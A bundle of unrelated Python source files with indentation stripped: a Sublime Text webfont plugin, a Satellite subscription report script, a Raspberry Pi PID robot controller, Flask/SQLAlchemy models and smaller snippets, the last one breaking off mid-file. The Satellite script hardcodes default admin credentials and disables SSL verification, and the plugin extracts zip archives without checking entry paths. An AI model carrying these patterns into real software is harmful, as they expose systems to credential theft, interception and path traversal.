"""Run forward."""
if not config.run_source_estimation:
msg = "Skipping, run_source_estimation is set to False …"
logger.info(**gen_log_kwargs(message=msg, emoji="skip"))
return
if config.use_template_mri is not None:
subjects = [config.use_template_mri]
else:
subjects = get_subjects(config=config)
with get_parallel_backend(config.exec_params):
parallel, run_func = parallel_func(
run_setup_source_space, exec_params=config.exec_params
)
logs = parallel(
run_func(
cfg=get_config(
config=config,
subject=subject,
),
exec_params=config.exec_params,
subject=subject,
)
for subject in subjects
)
save_logs(config=config, logs=logs)
|
#coding:utf-8
import sublime, sublime_plugin
import json
import webbrowser
import zipfile
import os
import threading
def is_st3():
return sublime.version()[0] == '3'
if is_st3():
import urllib.request
import io
else:
import urllib2
import cStringIO
class DriveSelector:
def __init__(self, window, callback):
self.window = window
self.callback = callback
self.drive_list = None
def _get_drives(self):
import string
drives = []
wd = os.getcwd()
for letter in string.lowercase:
drive = u'%s:\\' % letter
try:
os.chdir(drive)
drives.append(drive)
except:
pass
os.chdir(wd)
return drives
def _on_done(self, index):
if index < 0:
self.callback(None)
else:
self.callback(self.drive_list[index])
def _show_quick_panel(self, options, done):
if is_st3():
sublime.set_timeout(lambda: self.window.show_quick_panel(options, done), 10)
else:
self.window.show_quick_panel(options, done)
def select(self):
self.drive_list = self._get_drives()
self._show_quick_panel(self.drive_list, self._on_done)
class FolderBrowser:
def __init__(self, window, callback, curr_dir=None):
self.window = window
self.callback = callback
self.new_dir_name = 'new_folder'
if curr_dir is None:
self.curr_dir = os.path.abspath(os.path.dirname(__file__))
else:
self.curr_dir = os.path.abspath(curr_dir)
if is_st3():
try:
self.curr_dir = str(self.curr_dir, 'cp1251')
except:
self.curr_dir = str(self.curr_dir)
else:
try:
self.curr_dir = unicode(self.curr_dir, 'cp1251')
except:
self.curr_dir = unicode(self.curr_dir)
self.folder_list = []
self.driver_selector = DriveSelector(self.window, self._check_and_select)
def _get_file_name(self, file_path):
return os.path.split(file_path)[1]
def _try_to_set_curr_file_dir(self):
try:
view = self.window.active_view()
cur_file_path = view.file_name()
cur_file_dir = os.path.dirname(cur_file_path)
self.curr_dir = cur_file_dir
except:
pass
def _get_sub_dirs(self, dir_path):
subdirs = []
for f in os.listdir(dir_path):
full_path = os.path.abspath(os.path.join(dir_path, f))
if os.path.isdir(full_path):
subdirs.append(f)
return subdirs
def _show_quick_panel(self, options, done):
if is_st3():
sublime.set_timeout(lambda: self.window.show_quick_panel(options, done), 10)
else:
self.window.show_quick_panel(options, done)
def _check_dir(self, dir_path):
try:
os.listdir(dir_path)
except:
return False
else:
return True
def _create_dir(self):
def on_done(dir_name, *args):
self.new_dir_name = dir_name
try:
dir_path = os.path.normpath(os.path.join(self.curr_dir, dir_name))
os.mkdir(dir_path)
except Exception as e:
sublime.status_message(u'невозможно создать каталог: "%s"' % dir_path)
self._check_and_select(None)
else:
self._check_and_select(dir_path)
def on_cancel(*args):
self._check_and_select(None)
self.window.show_input_panel(u'Введите имя каталога:', self.new_dir_name, on_done, None, on_cancel)
def _show_folder_menu(self):
self._show_quick_panel(self.folder_list, self._folder_selected)
def _sort(self, lst):
if is_st3():
return sorted(lst, key = str.lower)
else:
return sorted(lst, cmp=lambda a,b: cmp(a.lower(), b.lower()))
def _folder_selected(self, index):
if index < 0:
self.callback(None)
elif index == 0:
dir_ = os.path.normpath(os.path.join(self.curr_dir, '..'))
self._check_and_select(dir_)
elif index == 1:
self.callback(self.curr_dir)
elif index == 2:
self._create_dir()
elif index == 3 and sublime.platform() == 'windows':
self.drives = self.driver_selector.select()
else:
dir_ = os.path.normpath(os.path.join(self.curr_dir, self.folder_list[index]))
self._check_and_select(dir_)
def _check_and_select(self, dir_):
if dir_ is not None:
if self._check_dir(dir_):
self.curr_dir = dir_
sublime.status_message(u'текущий каталог: "%s"' % self.curr_dir)
else:
sublime.status_message(u'невозможно войти в каталог "%s"; текущий каталог: "%s"' % (dir_, self.curr_dir))
self._select_folder()
def _select_folder(self):
self.folder_list = list()
for d in self._get_sub_dirs(self.curr_dir):
self.folder_list.append(d)
self.folder_list = self._sort(self.folder_list)
if sublime.platform() == 'windows':
self.folder_list.insert(0, u'* сменить диск')
self.folder_list.insert(0, u'* создать каталог')
self.folder_list.insert(0, u'* да, распаковать сюда')
self.folder_list.insert(0, u'* на уровень выше')
self._show_folder_menu()
def select_folder(self):
self._try_to_set_curr_file_dir()
self._select_folder()
class WebfontImportFontCommand(sublime_plugin.TextCommand):
def __init__(self, view):
super(WebfontImportFontCommand, self).__init__(view)
pass
def run(self, edit, text):
print("start WebfontImportFontCommand with args " + text)
importText = text
pos = self.view.sel()[0].a
self.view.insert(edit, pos, importText)
pass
class WebfontCommand(sublime_plugin.WindowCommand):
URL = 'http://webfonts.ru/api/list.json'
SITE_URL = 'http://webfont.ru/'
def __init__(self, window):
super(WebfontCommand, self).__init__(window)
print("Init webFont")
self.folder_browser = FolderBrowser(self.window, self._folder_selected)
self.font_data = self._download_font_info()
self.archive_url = None
def _download_font_info(self):
print("_download_font_info")
try:
if is_st3():
fd = urllib.request.urlopen(self.URL, timeout=5).read().decode("utf-8")
result = json.loads(fd)
else:
fd = urllib2.urlopen(self.URL, timeout=5)
result = json.load(fd)
except Exception as e:
print("exception " + str(e))
if is_st3():
sublime.error_message(u'не удалось обновить список шрифтов')
else:
sublime.status_message(u'не удалось обновить список шрифтов')
result = None
return result
def _download_font_archive(self, url):
try:
if is_st3():
zipped_data = urllib.request.urlopen(url, timeout=15).read()
result = io.BytesIO(zipped_data)
else:
zipped_data = urllib2.urlopen(url, timeout=15).read()
result = cStringIO.StringIO(zipped_data)
except Exception as e:
print("exception " + str(e))
if is_st3():
sublime.error_message(u'не удалось скачать шрифт')
else:
sublime.status_message(u'не удалось скачать шрифт')
result = None
return result
def _unpack_archive(self, fd, dest_folder):
try:
dest_folder = os.path.normpath(dest_folder)
print("dest folder" + dest_folder)
z = zipfile.ZipFile(fd)
for name in z.namelist():
if name.endswith('/'):
#this is folder
folder_path = os.path.join(dest_folder, name)
if not os.path.exists(folder_path):
os.makedirs(folder_path)
else:
file_path = os.path.join(dest_folder, name)
print("file_path" + file_path)
outfile = open(file_path, 'wb+')
outfile.write(z.read(name))
outfile.close()
fd.close()
return True
except Exception as e:
print("exception " + str(e))
if is_st3():
sublime.error_message(u'при распаковке шрифта произошла ошибка')
else:
sublime.status_message(u'при распаковке шрифта произошла ошибка')
return False
def run(self):
print("command start")
name_list = [u'* перейти на webfont.ru', u'* обновить список шрифтов', u'* скачать шрифт']
if self.font_data is not None:
for i in self.font_data:
name_list.append(i['name'])
self.window.show_quick_panel(name_list, self._selected)
def _insert(self, text):
if is_st3():
self.window.active_view().run_command("webfont_import_font", {"text" : text })
else:
view = self.window.active_view()
edit = view.begin_edit()
pos = view.sel()[0].a
view.insert(edit, pos, text)
view.end_edit(edit)
def _download_font_archive_and_unpack(self, dest_folder, pack_url):
fd = self._download_font_archive(pack_url)
if fd is None:
return
res = self._unpack_archive(fd, dest_folder)
if not res:
return
sublime.status_message(u'шрифт успешно скачан')
def _folder_selected(self, dest_folder):
if dest_folder is None:
return
sublime.status_message(u'немного подождите')
t = threading.Thread(args=(dest_folder, self.archive_url, ), target=self._download_font_archive_and_unpack)
t.start()
def _font_archive_selected(self, index):
if index < 0: return
self.archive_url = self.font_data[index]['pack_url']
self.folder_browser.select_folder()
def _show_quick_panel(self, options, done):
if is_st3():
sublime.set_timeout(lambda: self.window.show_quick_panel(options, done), 10)
else:
self.window.show_quick_panel(options, done)
def _selected(self, index):
if index < 0: return
if index == 0:
try:
webbrowser.open(self.SITE_URL)
except:
sublime.status_message(u'не удалось открыть страницу "%s"' % self.SITE_URL)
elif index == 1:
old_font_data = self.font_data
self.font_data = self._download_font_info()
if self.font_data is None:
self.font_data = old_font_data
self.run()
elif index == 2:
name_list = []
if self.font_data is not None:
for i in self.font_data:
name_list.append(i['name'])
self._show_quick_panel(name_list, self._font_archive_selected)
else:
text = self.font_data[index-3]['import'] + '\n' + self.font_data[index-3]['comments']
self._insert(text) |
# Question:-
# The purpose of this problem is to verify whether the method you are using to read input data is sufficiently fast to handle problems
# branded with the enormous Input/Output warning. You are expected to be able to process at least 2.5MB of input data per second at runtime.
# Input:-
# The input begins with two positive integers n k (n, k<=107). The next n lines of
# input contain one positive integer ti, not greater than 109, each.
# Output:-
# Write a single integer to output, denoting how many integers ti are divisible by k.
# Example:-
# Input:
# 7 3
# 1
# 51
# 966369
# 7
# 9
# 999996
# 11
# Output:
# 4
Code:-
str = input().split()
n = int(str[0])
k = int(str[1])
ans = 0
for i in range(n):
a = int(input())
if a%k==0:
ans = ans + 1
print(ans)
#This is the code for Enourmus Input Test. This is the second problem in Beginner's Section.
#Thank you for reading my code!!!
#if you like:
# give a star
#else:
# give a star
|
#!/usr/bin/python
"""
Date .......: 01/06/2019
Developer ..: Waldirio M Pinheiro (waldirio@redhat.com / waldirio@gmail.com)
Purpose ....: Collect information from Satellite Server and show hypervisor versus Content Host
- Subscription information
"""
import sys
import datetime
import urllib3
try:
import requests
except ImportError:
print "Please install the python-requests module."
sys.exit(-1)
# URL to your Satellite 6 server
URL = "https://sat631.local.domain"
# Default credentials to login to Satellite 6
USERNAME = "admin"
PASSWORD = "redhat"
# URL for the API to your deployed Satellite 6 server
SAT_API = "%s/api/v2/" % URL
# Ignore SSL for now
SSL_VERIFY = False
# Entries Number on Report *object per page*
NUM_ENTRIES_ON_REPORT = "50000"
hyper_list = []
final_list = []
hyper_detail = []
hypervisor_name = ""
subscription_name = ""
urllib3.disable_warnings()
def get_json(location):
"""
Performs a GET using the passed URL location
"""
r = requests.get(location, auth=(USERNAME, PASSWORD), verify=SSL_VERIFY)
return r.json()
def save_on_disk():
print "## Phase 3: {}".format(datetime.datetime.now())
FILE = "/tmp/ch_entitlement.csv"
print "Saving on file: {}".format(FILE)
fp = open(FILE, "w+")
fp.write("hypervisor_name,hypervisor_entitlement,content_host_name,content_host_entitlement\n")
for item in final_list:
fp.write("{},{},{},{}\n".format(item[0], item[1], item[2], item[3]))
fp.close()
def check_content_host():
global hyper_detail
global hypervisor_name
global subscription_name
try:
num_vguests = len(hyper_detail['subscription_facet_attributes']['virtual_guests'])
except KeyError:
print "KeyError: Hypervisor to check: {}".format(hyper_detail['name'])
num_vguests = 0
if (num_vguests == 0):
content_host_name = None
ch_entitlement = None
# print "{},{},{},{}".format(hypervisor_name,subscription_name,content_host_name,ch_entitlement)
aux = hypervisor_name, subscription_name, content_host_name, ch_entitlement
final_list.append(aux)
else:
for content_host in hyper_detail['subscription_facet_attributes']['virtual_guests']:
content_host_id = content_host['id']
content_host_name = content_host['name']
content_host_info = get_json(SAT_API + "hosts/" + str(content_host_id) + "/subscriptions")
check_results = 0
try:
check_results = len(content_host_info['results'])
except KeyError:
check_results = -999
if (check_results == -999):
ch_entitlement = "Check This Machine"
else:
if (len(content_host_info['results']) == 0):
ch_entitlement = None
# print "{},{},{},{}".format(hypervisor_name,subscription_name,content_host_name,ch_entitlement)
aux = hypervisor_name, subscription_name, content_host_name, ch_entitlement
final_list.append(aux)
else:
for ch_entitlement in content_host_info['results']:
# print "{},{},{},{}".format(hypervisor_name,subscription_name,content_host_name,ch_entitlement['product_name'].replace(",",""))
try:
product_name_temp = ch_entitlement['product_name'].replace(",", "")
except KeyError:
product_name_temp = "No_Product_Name_Key"
# aux = hypervisor_name, subscription_name, content_host_name, ch_entitlement['product_name'].replace(",", "")
aux = hypervisor_name, subscription_name, content_host_name, product_name_temp
final_list.append(aux)
def generate_report():
global hyper_detail
global hypervisor_name
global subscription_name
print "## Phase 2: {}".format(datetime.datetime.now())
for hyper in hyper_list:
hyper_info = get_json(SAT_API + "hosts/" + str(hyper['id']) + "/subscriptions")
hyper_detail = get_json(SAT_API + "hosts/" + str(hyper['id']))
# Hypervisor Name
hypervisor_name = hyper['name']
# Hypervisor Entitlement
try:
check_results = len(hyper_info['results'])
except IndexError:
subscription_name = None
except KeyError:
subscription_name = None
if (check_results == 0):
subscription_name = None
check_content_host()
else:
for ent in hyper_info['results']:
subscription_name = ent['name'].replace(",", "")
check_content_host()
def main():
print """
Script in 3 Phases
1. Collect the whole Content Host info from Satellite and filter only virt-who-*
2. Process all Hypervisors (virt-who-*) and Content Hosts running on the TOP of each one
3. Generate a huge CSV file with the entitlement information
"""
count_hosts = get_json(SAT_API + "hosts" + "?per_page=0&search=name~virt-who-*")['subtotal']
print "## Phase 1 ({} Hypervisors): {}".format(count_hosts, datetime.datetime.now())
hosts = get_json(SAT_API + "hosts" + "?per_page=" + NUM_ENTRIES_ON_REPORT + "&search=name~virt-who-*")
# Filtering all Hypervisors (virt-who-*) || Updated, the filter now is via search on the API query
for host in hosts['results']:
hyper_list.append(host)
# Generating the Report
generate_report()
# Saving on disk
save_on_disk()
print "Ending: {}".format(datetime.datetime.now())
if __name__ == "__main__":
main()
|
setpoint = 11
Kp=5
Ki=2
Kd=0.2
DT = 0.02
#Best values
'''
10,5,0.22
'''
#Driver for the LSM303D accelerometer and L3GD20H magnetometer and compass
#First follow the procedure to enable I2C on R-Pi.
#1. Add the lines ic2-bcm2708 and i2c-dev to the file etcmodules
#2. Comment out the line blacklist ic2-bcm2708 (with a #) in the file etcmodprobe.draspi-blacklist.conf
#3. Install I2C utility (including smbus) with the command apt-get install python-smbus i2c-tools
#4. Connect the I2C device and detect it using the command i2cdetect -y 1. It should show up as 1D or 1E (here the variable LSM is set to 1D).
import time, math
import wiringpi2 as wiringpi
from smbus import SMBus
busNum = 1
bus = SMBus(busNum)
class PID:
""" Simple PID control.
This class implements a simplistic PID control algorithm. When first
instantiated all the gain variables are set to zero, so calling
the method GenOut will just return zero.
"""
def __init__(self):
# initialize gains
self.Kp = 0
self.Kd = 0
self.Ki = 0
self.Initialize()
def SetKp(self, invar):
""" Set proportional gain. """
self.Kp = invar
def SetKi(self, invar):
""" Set integral gain. """
self.Ki = invar
def SetKd(self, invar):
""" Set derivative gain. """
self.Kd = invar
def SetPrevErr(self, preverr):
""" Set previous error value. """
self.prev_err = preverr
def Initialize(self):
# initialize delta t variables
self.currtm = time.time()
self.prevtm = self.currtm
self.prev_err = 0
# term result variables
self.Cp = 0
self.Ci = 0
self.Cd = 0
def GenOut(self, error):
""" Performs a PID computation and returns a control value based on
the elapsed time (dt) and the error signal from a summing junction
(the error parameter).
"""
self.currtm = time.time() # get t
dt = self.currtm - self.prevtm # get delta t
de = error - self.prev_err # get delta error
self.Cp = self.Kp * error # proportional term
self.Ci += error * dt # integral term
self.Cd = 0
if dt > 0: # no div by zero
self.Cd = de/dt # derivative term
self.prevtm = self.currtm # save t for next pass
self.prev_err = error # save t-1 error
# sum the terms and return the result
return self.Cp + (self.Ki * self.Ci) + (self.Kd * self.Cd)
def convert(msb, lsb):
value = 256*msb + lsb
if value >= 32768:
return value - 65536
else:
return value
def translate(value, PIDMin, PIDMax, PWMMin, PWMMax):
# Figure out how 'wide' each range is
PIDSpan = PIDMax - PIDMin
PWMSpan = PWMMax - PWMMin
# Convert the PID output range into a 0-1 range in float casting
valueScaled = float(value - PIDMin) / float(PIDSpan)
# Convert the 0-1 range into a value in the PWM range.
return PWMMin + (valueScaled * PWMSpan)
# LSM303D Registers
LSM = 0x1d #I2C Address of the LSM303D
LSM_WHOAMI_ID = 0b1001001 #Device self-id
LSM_WHOAMI_ADDRESS = 0x0F
#Control register addresses -- from LSM303D datasheet
CTRL_0 = 0x1F #General settings
CTRL_1 = 0x20 #Turns on accelerometer and configures data rate
CTRL_2 = 0x21 #Self test accelerometer, anti-aliasing accel filter
CTRL_3 = 0x22 #Interrupts
CTRL_4 = 0x23 #Interrupts
CTRL_5 = 0x24 #Turns on temperature sensor
CTRL_6 = 0x25 #Magnetic resolution selection, data rate config
CTRL_7 = 0x26 #Turns on magnetometer and adjusts mode
#Registers holding twos-complemented MSB and LSB of magnetometer readings -- from LSM303D datasheet
MAG_X_LSB = 0x08 # x
MAG_X_MSB = 0x09
MAG_Y_LSB = 0x0A # y
MAG_Y_MSB = 0x0B
MAG_Z_LSB = 0x0C # z
MAG_Z_MSB = 0x0D
#Registers holding twos-complemented MSB and LSB of magnetometer readings -- from LSM303D datasheet
ACC_X_LSB = 0x28 # x
ACC_X_MSB = 0x29
ACC_Y_LSB = 0x2A # y
ACC_Y_MSB = 0x2B
ACC_Z_LSB = 0x2C # z
ACC_Z_MSB = 0x2D
#Registers holding 12-bit right justified, twos-complemented temperature data -- from LSM303D datasheet
TEMP_MSB = 0x05
TEMP_LSB = 0x06
## L3GD20H registers
LGD = 0x6b #Device I2C slave address
LGD_WHOAMI_ADDRESS = 0x0F
LGD_WHOAMI_ID = 0b11010111 #Device self-id
LGD_CTRL_1 = 0x20 #turns on gyro
LGD_CTRL_2 = 0x21 #can set a high-pass filter for gyro
LGD_CTRL_3 = 0x22
LGD_CTRL_4 = 0x23
LGD_CTRL_5 = 0x24
LGD_CTRL_6 = 0x25
LGD_TEMP = 0x26
#Registers holding gyroscope readings
LGD_GYRO_X_LSB = 0x28
LGD_GYRO_X_MSB = 0x29
LGD_GYRO_Y_LSB = 0x2A
LGD_GYRO_Y_MSB = 0x2B
LGD_GYRO_Z_LSB = 0x2C
LGD_GYRO_Z_MSB = 0x2D
if bus.read_byte_data(LSM, LSM_WHOAMI_ADDRESS) == LSM_WHOAMI_ID:
print 'LSM303D detected successfully.'
else:
print 'No LSM303D detected on bus '+str(busNum)+'.'
if bus.read_byte_data(LGD, LGD_WHOAMI_ADDRESS) == LGD_WHOAMI_ID:
print 'L3GD20H detected successfully.'
else:
print 'No L3GD20H detected on bus on I2C bus '+str(busNum)+'.'
bus.write_byte_data(LSM, CTRL_1, 0b1100111) # enable accelerometer, 100 hz sampling
bus.write_byte_data(LSM, CTRL_2, 0b0000000) #set +- 2g full scale page 36 datasheet
bus.write_byte_data(LSM, CTRL_5, 0b01100100) #high resolution mode, thermometer off, 6.25hz ODR
bus.write_byte_data(LSM, CTRL_6, 0b00100000) # set +- 4 gauss full scale
bus.write_byte_data(LSM, CTRL_7, 0x00) #get magnetometer out of low power mode
bus.write_byte_data(LGD, LGD_CTRL_1, 0x0F) #turn on gyro and set to normal mode
bus.write_byte_data(LGD, LGD_CTRL_4, 0b00110000) #set 2000 dps full scale
wiringpi.wiringPiSetup()
wiringpi.pinMode(1, 2) # sets WP pin 1 to PWM
wiringpi.pwmWrite(1, 0)# duty cycle between 0 and 1024. 0 = off, 1024 = fully on
wiringpi.pinMode(3, 1) # sets WP pin 3 to output
wiringpi.pinMode(4, 1) # sets WP pin 4 to output
wiringpi.pinMode(5, 1) # sets WP pin 5 to output
wiringpi.pinMode(6, 1) # sets WP pin 6 to output
PI = 3.14159265358979323846
RAD_TO_DEG = 57.29578
AA = 0.98
gyrox_angle = 0.0
gyroy_angle = 0.0
gyroz_angle = 0.0
CFangx = 0.0
CFangy = 0.0
pid = PID()
pid.SetKp(Kp)
pid.SetKi(Ki)
pid.SetKd(Kd)
fo = open("pid.csv","w")
fo.write( str(Kp) + "\n")
fo.write( str(Ki) + "\n")
fo.write( str(Kd) + "\n")
while True:
now = time.time() #use wall time instead of process time
#magx = convert(bus.read_byte_data(LSM, MAG_X_MSB), bus.read_byte_data(LSM, MAG_X_LSB))
#magy = convert(bus.read_byte_data(LSM, MAG_Y_MSB), bus.read_byte_data(LSM, MAG_Y_LSB))
#magz = convert(bus.read_byte_data(LSM, MAG_Z_MSB), bus.read_byte_data(LSM, MAG_Z_LSB))
#print "Magnetic field (x, y, z):", magx, magy, magz
accx = convert(bus.read_byte_data(LSM, ACC_X_MSB), bus.read_byte_data(LSM, ACC_X_LSB))
accy = convert(bus.read_byte_data(LSM, ACC_Y_MSB), bus.read_byte_data(LSM, ACC_Y_LSB))
accz = convert(bus.read_byte_data(LSM, ACC_Z_MSB), bus.read_byte_data(LSM, ACC_Z_LSB))
accx = accx * 0.061 * 0.001 +0.06
accy = accy * 0.061 * 0.001 -0.02
accz = accz * 0.061 * 0.001 -0.08# the reading has offset, correction of 0.1 needed
#print "Acceleration (x, y, z):", accx, accy, accz
gyrox = convert(bus.read_byte_data(LGD, LGD_GYRO_X_MSB), bus.read_byte_data(LGD, LGD_GYRO_X_LSB))
gyroy = convert(bus.read_byte_data(LGD, LGD_GYRO_Y_MSB), bus.read_byte_data(LGD, LGD_GYRO_Y_LSB))
gyroz = convert(bus.read_byte_data(LGD, LGD_GYRO_Z_MSB), bus.read_byte_data(LGD, LGD_GYRO_Z_LSB))
rate_gyrox = gyrox * 0.07
rate_gyroy = gyroy * 0.07
rate_gyroz = gyroz * 0.07
gyrox_angle+=rate_gyrox*DT
gyroy_angle+=rate_gyroy*DT
gyroz_angle+=rate_gyroz*DT
#gyx = rate_gyrox*DT
#gyy = rate_gyroy*DT
#gyz = rate_gyroz*DT
#print "Gyroscope (x, y, z):", gyx, gyy, gyz
accx_angle = (math.atan2(accy,accz))*RAD_TO_DEG
#accy_angle = (math.atan2(-accx,accz))*RAD_TO_DEG
""" The following code does not have problems with regions of instability but consumes a lot of processing power
#accx_angle = (math.atan2(accy,math.sqrt(accx*accx+accz*accz))+PI)*RAD_TO_DEG
#accy_angle = (math.atan2(accx,math.sqrt(accy*accy+accz*accz))+PI)*RAD_TO_DEG
"""
#print "Accelerometer Angle = ", accx_angle
CFangx = AA*(CFangx+rate_gyrox*DT) +(1 - AA) * accx_angle
#CFangy = AA*(CFangy+rate_gyroy*DT) +(1 - AA) * accy_angle
print "Filtered Angle = ", CFangx #, CFangy # accx_angle,accy_angle #
error = setpoint - CFangx
output = pid.GenOut(error)
print "output = ", output
if (output < 0) : #CFangx or output??
wiringpi.digitalWrite(3, 0) #In1 High
wiringpi.digitalWrite(4, 1) #In2 Low
# wiringpi.digitalWrite(5, 1) #In3 Low
# wiringpi.digitalWrite(6, 0) #In4 High
else :
wiringpi.digitalWrite(3, 1) #In1 Low
wiringpi.digitalWrite(4, 0) #in2 High
# wiringpi.digitalWrite(5, 0) #In3 High
# wiringpi.digitalWrite(6, 1) #In4 Low
if (output < 0) :
posoutput = -output
else :
posoutput = output
pwmout = translate(posoutput,0,50,900,1024)
if (pwmout > 1024) :
pwmout = 1024
wiringpi.pwmWrite(1,int(pwmout))
fo.write(str(CFangx)+","+str(output)+"\n")
#print "pwmout = ", pwmout
'''
if (output < 0)
wiringpi.digitalWrite(3, 1) #enable pin A
wiringpi.digitalWrite(1, 1) #In1 High
wiringpi.digitalWrite(4, 0) #In2 Low
else :
wiringpi.digitalWrite(0, 1) #enable pin
wiringpi.digitalWrite(1, 0) #In1 Low
wiringpi.digitalWrite(4, 1) #in2 High
'''
#print "time = ", time.time()-now
while (time.time() <= now + DT):
pass
|
import os
import datetime
import hashlib
from nova import app, db
from sqlalchemy_utils import PasswordType, force_auto_coercion
from itsdangerous import Signer, BadSignature
force_auto_coercion()
class User(db.Model):
__tablename__ = 'users'
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String, unique=True)
email = db.Column(db.String)
fullname = db.Column(db.String)
is_admin = db.Column(db.Boolean, default=False)
password = db.Column(PasswordType(
schemes=['pbkdf2_sha512'],
pbkdf2_sha512__default_rounds=50000,
pbkdf2_sha512__salt_size=16),
nullable=False)
token = db.Column(db.String)
token_time = db.Column(db.DateTime)
gravatar = db.Column(db.String)
first_time = db.Column(db.Boolean, default=True)
def __init__(self, name=None, fullname=None, email=None, password=None, is_admin=False):
self.name = name
self.fullname = fullname
self.email = email
self.password = password
self.is_admin = is_admin
self.gravatar = hashlib.md5(email.lower()).hexdigest()
def __repr__(self):
return '<User(name={}, fullname={}>'.format(self.name, self.fullname)
def get_signer(self):
return Signer(self.password.hash + self.token_time.isoformat())
def generate_token(self):
self.token_time = datetime.datetime.utcnow()
self.token = self.get_signer().sign(str(self.id))
db.session.commit()
def is_token_valid(self, token):
try:
if str(self.id) != self.get_signer().unsign(token):
return False
except BadSignature:
return False
return True
def is_authenticated(self):
return True
def is_active(self):
return True
def is_anonymous(self):
return False
def get_id(self):
return self.name
def to_dict(self):
return dict(name=self.name, email=self.email, fullname = self.fullname)
class Collection(db.Model):
__tablename__ = 'collections'
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String)
description = db.Column(db.String)
datasets = db.relationship('Dataset', cascade='all, delete, delete-orphan')
def __repr__(self):
return '<Collection(name={})>'.format(self.name)
class Group(db.Model):
__tablename__ = 'groups'
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String)
description = db.Column(db.String)
memberships = db.relationship('Membership', cascade='all, delete, delete-orphan')
class Membership(db.Model):
__tablename__ = 'memberships'
id = db.Column(db.Integer, primary_key=True)
user_id = db.Column(db.Integer, db.ForeignKey('users.id'))
group_id = db.Column(db.Integer, db.ForeignKey('groups.id'))
is_creator = db.Column(db.Boolean, default=False)
is_admin = db.Column(db.Boolean, default=False)
user = db.relationship('User')
group = db.relationship('Group')
class Dataset(db.Model):
__tablename__ = 'datasets'
id = db.Column(db.Integer, primary_key=True)
type = db.Column(db.String(50))
name = db.Column(db.String)
description = db.Column(db.String)
path = db.Column(db.String)
created = db.Column(db.DateTime, default=datetime.datetime.utcnow)
closed = db.Column(db.Boolean, default=False)
collection_id = db.Column(db.Integer, db.ForeignKey('collections.id'))
has_thumbnail = db.Column(db.Boolean, default=False)
collection = db.relationship('Collection', back_populates='datasets')
accesses = db.relationship('Access', cascade='all, delete, delete-orphan')
permissions = db.relationship('Permission', uselist=False)
__mapper_args__ = {
'polymorphic_identity': 'dataset',
'polymorphic_on': type
}
def to_dict(self):
path = os.path.join(app.config['NOVA_ROOT_PATH'], self.path)
return dict(name=self.name, path=path, closed=self.closed, description=self.description)
def __repr__(self):
return '<Dataset(name={}, path={}>'.format(self.name, self.path)
class Taxon(db.Model):
__tablename__ = 'taxons'
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String)
def __repr__(self):
return '<Taxon(name={}>'.format(self.name)
class Order(db.Model):
__tablename__ = 'orders'
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String)
def __repr__(self):
return '<Order(name={}>'.format(self.name)
class Family(db.Model):
__tablename__ = 'families'
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String)
def __repr__(self):
return '<Family(name={}>'.format(self.name)
class Genus(db.Model):
__tablename__ = 'genuses'
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String)
def __repr__(self):
return '<Genus(name={}>'.format(self.name)
class SampleScan(Dataset):
__tablename__ = 'samplescans'
__mapper_args__ = {
'polymorphic_identity': 'samplescan'
}
id = db.Column(db.Integer, db.ForeignKey('datasets.id'), primary_key=True)
taxon_id = db.Column(db.Integer, db.ForeignKey('taxons.id'), nullable=True)
genus_id = db.Column(db.Integer, db.ForeignKey('genuses.id'), nullable=True)
family_id = db.Column(db.Integer, db.ForeignKey('families.id'), nullable=True)
order_id = db.Column(db.Integer, db.ForeignKey('orders.id'), nullable=True)
taxon = db.relationship('Taxon')
genus = db.relationship('Genus')
family = db.relationship('Family')
order = db.relationship('Order')
class Volume(Dataset):
__tablename__ = 'volumes'
__mapper_args__ = {
'polymorphic_identity': 'volume'
}
id = db.Column(db.Integer, db.ForeignKey('datasets.id'), primary_key=True)
slices = db.Column(db.String)
class Permission(db.Model):
__tablename__ = 'permissions'
id = db.Column(db.Integer, primary_key=True)
owner_id = db.Column(db.Integer, db.ForeignKey('users.id'))
dataset_id = db.Column(db.Integer, db.ForeignKey('datasets.id'))
can_read = db.Column(db.Boolean, default=True)
can_interact = db.Column(db.Boolean, default=True)
can_fork = db.Column(db.Boolean, default=False)
owner = db.relationship('User')
dataset = db.relationship('Dataset', back_populates='permissions')
def __repr__(self):
return '<Permission(dataset={}, owner = {}, read={}, interact={}, fork={}>'.\
format(self.dataset, self.owner, self.can_read, self.can_interact, self.can_fork)
class Access(db.Model):
__tablename__ = 'accesses'
id = db.Column(db.Integer, primary_key=True)
user_id = db.Column(db.Integer, db.ForeignKey('users.id'))
dataset_id = db.Column(db.Integer, db.ForeignKey('datasets.id'))
owner = db.Column(db.Boolean)
writable = db.Column(db.Boolean)
seen = db.Column(db.Boolean, default=False)
user = db.relationship('User')
dataset = db.relationship('Dataset', back_populates='accesses')
def __repr__(self):
return '<Access(user={}, dataset={}, owner={}, writable={}>'.\
format(self.user.name, self.dataset.name, self.owner, self.writable)
class Notification(db.Model):
__tablename__ = 'notifications'
id = db.Column(db.Integer, primary_key=True)
message = db.Column(db.String)
user_id = db.Column(db.Integer, db.ForeignKey('users.id'))
user = db.relationship('User')
type = db.Column(db.String)
def __init__(self, user, type='message', message=None):
self.user = user
self.type = type
self.message = message
def __repr__(self):
return '<Notification(user={}, message={})>'.\
format(self.user.name, self.message)
def to_dict(self):
return {'message': self.message, 'id': self.id, 'type': self.type}
class Process(db.Model):
__tablename__ = 'processes'
id = db.Column(db.Integer, primary_key=True)
type = db.Column(db.String(50))
task_uuid = db.Column(db.String)
source_id = db.Column(db.Integer, db.ForeignKey('datasets.id'))
destination_id = db.Column(db.Integer, db.ForeignKey('datasets.id'))
collection_id = db.Column(db.Integer, db.ForeignKey('collections.id'))
source = db.relationship('Dataset', foreign_keys=[source_id])
destination = db.relationship('Dataset', foreign_keys=[destination_id])
collection = db.relationship('Collection')
__mapper_args__ = {
'polymorphic_identity': 'process',
'polymorphic_on': type
}
def __repr__(self):
return '<Process(src={}, dst={})>'.\
format(self.source.name, self.destination.name)
class Reconstruction(Process):
__tablename__ = 'reconstructions'
__mapper_args__ = {
'polymorphic_identity': 'reconstruction'
}
id = db.Column(db.Integer, db.ForeignKey('processes.id'), primary_key=True)
flats = db.Column(db.String())
darks = db.Column(db.String())
projections = db.Column(db.String())
output = db.Column(db.String())
class Derivation(Process):
